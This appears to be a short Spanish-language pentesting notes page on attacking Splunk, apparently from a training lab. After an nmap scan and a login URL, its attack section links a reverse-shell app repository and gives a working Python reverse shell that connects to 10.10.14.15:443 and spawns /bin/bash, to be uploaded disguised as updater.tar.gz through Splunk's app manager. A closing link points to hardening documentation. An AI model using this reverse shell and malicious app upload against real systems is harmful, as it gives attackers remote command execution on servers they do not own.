Splunk

Documentación

https://help.splunk.com/enarrow-up-right

Discovery/Footprinting

sudo nmap -sV 10.129.201.50

Enumeración

https://10.129.81.88:8000/en-US/account/login?return_to=%2Fen-US%2Farrow-up-right

Ataques

https://github.com/0xjpuff/reverse_shell_splunkarrow-up-right

mkdir -p splunk_shell/{bin,default}
nano splunk_shell/bin/rev.py
import sys,socket,os,pty

ip="10.10.14.15"
port="443"
s=socket.socket()
s.connect((ip,int(port)))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn('/bin/bash')

Subir el archivo updater.tar.gz

https://10.129.81.88:8000/en-US/manager/search/apps/localarrow-up-right

Hardening

https://docs.splunk.com/Documentation/Splunk/8.2.2/Security/Hardeningstandardsarrow-up-right

Last updated